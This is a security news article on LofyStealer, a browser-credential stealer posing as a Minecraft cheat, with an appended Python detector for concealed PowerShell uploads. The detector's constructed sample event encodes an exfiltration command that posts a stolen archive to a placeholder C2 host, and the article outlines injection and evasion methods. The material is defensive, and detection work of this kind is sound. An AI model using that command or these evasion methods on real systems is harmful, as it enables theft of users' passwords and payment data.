A malware strain known as LofyStealer is targeting Minecraft players by masquerading as a cheat tool named “Slinky.” The software uses stealthy techniques to extract sensitive information from web browsers.
Malware Operation and Impact
LofyStealer executes a two-stage attack that bypasses standard security measures. It uses a Node.js-based loader together with a C++ payload to get into browser memory. The malware affects major browsers such as Chrome, Edge, and Firefox, extracting data like passwords and payment information.
The campaign is more complex than typical gaming-themed malware and targets eight browsers in total. It silently harvests cookies, saved passwords, and other critical data, making it a significant threat to users.
Discovery and Attribution
Security experts at Zenox.ai discovered LofyStealer during a threat analysis on the ANY.RUN sandbox platform. Their investigations linked the malware to LofyGang, a cybercrime group from Brazil, known since October 2022 for similar activities.
Evidence includes Brazilian Portuguese code strings and a command-and-control server located in Brazil. The server’s branding as “LofyStealer, Advanced C2 Platform V2.0” further supports these findings.
Malware Distribution and Prevention
LofyStealer’s distribution relies heavily on social engineering, disguising the malicious file as a legitimate Minecraft cheat. This tactic is effective due to Minecraft’s young audience, who often download unofficial mods.
Organizations should discourage downloading from untrusted sources and enhance security measures. Utilizing endpoint protection with in-memory injection detection and enabling multi-factor authentication can reduce risks significantly.
Technical Sophistication and Defense
The malware’s technical strength lies in its in-memory injection capabilities. The second-stage payload, chromelevator.exe, injects into browser processes without being flagged by traditional security tools. It avoids commonly monitored API calls, using direct syscalls instead to remain hidden.
Data is extracted and transmitted to the C2 server using a concealed PowerShell command, ensuring minimal detection. Blocking traffic to specific IPs and monitoring for suspicious PowerShell activity are recommended countermeasures.
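As an added example (not code from the article, Zenox.ai or ANY.RUN), the following Python scores PowerShell process-creation records for the traits the article describes: a concealed (encoded, hidden-window) PowerShell upload launched by the second-stage payload. The Sysmon-style field names, the scoring thresholds and the sample events are assumptions constructed for the example, not telemetry from the campaign.

```python
import base64
import re

# Constructed detection logic for the exfiltration pattern described in the article.
# Field names (Image, ParentImage, CommandLine) are assumed, Sysmon-style; thresholds are illustrative.
USER_WRITABLE = re.compile(r"(?i)\\(?:AppData|Temp|Downloads|Public)\\")
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})")
HIDDEN_WIN = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
NET_UPLOAD = re.compile(
    r"(?i)Invoke-(?:WebRequest|RestMethod)|Net\.WebClient|Upload(?:File|String|Data)|-Method\s+POST")


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event):
    """Return (score, reasons) for one process-creation record; score >= 3 is worth an alert."""
    reasons = []
    if not event["Image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, reasons
    cmd = event["CommandLine"]
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command")
    if HIDDEN_WIN.search(cmd):
        reasons.append("hidden window")
    if NET_UPLOAD.search(cmd) or (decoded and NET_UPLOAD.search(decoded)):
        reasons.append("network upload cmdlet")
    if USER_WRITABLE.search(event["ParentImage"]):  # parent payload dropped in a user-writable path
        reasons.append("parent launched from user-writable path")
    return len(reasons), reasons


def build_sample_events():
    """Constructed telemetry: a benign admin invocation and one shaped like the article's description."""
    script = "Invoke-WebRequest -Uri http://c2.invalid/up -Method POST -InFile $env:TEMP\\loot.zip"
    enc = base64.b64encode(script.encode("utf-16-le")).decode()  # how -EncodedCommand is packed
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    return [
        {"Image": ps, "ParentImage": r"C:\Windows\explorer.exe",
         "CommandLine": "powershell.exe Get-Service -Name Spooler"},
        {"Image": ps, "ParentImage": r"C:\Users\user\AppData\Local\Temp\chromelevator.exe",
         "CommandLine": f"powershell.exe -NoP -W Hidden -enc {enc}"},
    ]
```

Run `score_event` over each record from your own process-creation telemetry; the decoded script is what an analyst would pivot on to find the C2 address to block.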
For enhanced protection, users are advised to refrain from downloading unofficial game utilities and to implement robust security practices. Staying informed and proactive is crucial in combating threats like LofyStealer.
